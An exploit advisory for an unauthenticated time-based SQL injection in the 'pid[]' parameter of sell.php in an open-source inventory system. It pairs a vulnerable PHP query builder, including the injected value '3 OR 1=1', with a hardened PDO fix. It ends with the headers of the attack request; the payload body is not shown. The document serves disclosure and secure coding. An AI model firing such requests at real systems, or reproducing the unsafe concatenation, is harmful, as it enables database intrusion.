Authored by Sefa Ozan

Free and Open Source Inventory Management System version 1.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: Free and Open Source Inventory Management System 1.0 - Unauthenticated SQL Injection
# Exploit Author: Sefa Ozan
# Date: 16/09/2023
# Vendor: MAYURIK
# Vendor Homepage:
# Software Link:
# Tested on: Windows 10 Pro & Ubuntu 22.04

## Description:
The `pid[]` parameter is vulnerable to time-based SQL injection. To prove the existence of the vulnerability, the database was made to sleep for 10 seconds.
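The root cause of this class of bug is request array elements being concatenated into the query text. As an added illustration that is not the project's code (the real sell.php, its table and column names are unknown here and are hypothetical), a vulnerable builder for a `pid[]` style parameter is shown beside a hardened PDO version that validates each element as an integer id and binds it with its own placeholder:

```php
<?php
// Added example, not from the project. Table and column names are hypothetical.

// VULNERABLE pattern: array elements are joined straight into the SQL text.
// Only the query text is returned here so the flaw is visible without executing it.
function buildProductQueryUnsafe(array $pids): string {
    return "SELECT id, name FROM products WHERE id IN (" . implode(',', $pids) . ")";
}

// HARDENED pattern: every element must be a plain integer id; each is bound separately.
function fetchProductsSafe(PDO $db, array $pids): array {
    $ids = [];
    foreach ($pids as $p) {
        if (!is_scalar($p) || preg_match('/^\d{1,10}$/', (string)$p) !== 1) {
            throw new InvalidArgumentException('pid[] must contain only integer ids');
        }
        $ids[] = (int)$p;
    }
    if ($ids === []) {
        return [];
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("SELECT id, name FROM products WHERE id IN ($placeholders) ORDER BY id");
    foreach ($ids as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT); // positional params are 1-indexed
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Self-contained demo on an in-memory SQLite database with constructed rows.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)");
$db->exec("INSERT INTO products VALUES (1,'bolt'), (2,'nut'), (3,'washer')");

// Well-formed request body pid[]=1&pid[]=3 arrives in $_POST['pid'] as ['1', '3'].
print_r(fetchProductsSafe($db, ['1', '3']));

// A non-integer element: the unsafe builder embeds it verbatim in the query text ...
echo buildProductQueryUnsafe(['1', '3 OR 1=1']), "\n";
// ... while the hardened version rejects the request before any SQL is built.
try {
    fetchProductsSafe($db, ['1', '3 OR 1=1']);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

In a real handler, also normalise the input first (`$pids = (array)($_POST['pid'] ?? [])`) so a scalar `pid` and an array `pid[]` take the same validated path.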

## Request:
POST /ample/app/action/sell.php HTTP/1.1
Host: localhost
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Length: 297
Content-Type: application/x-www-form-urlencoded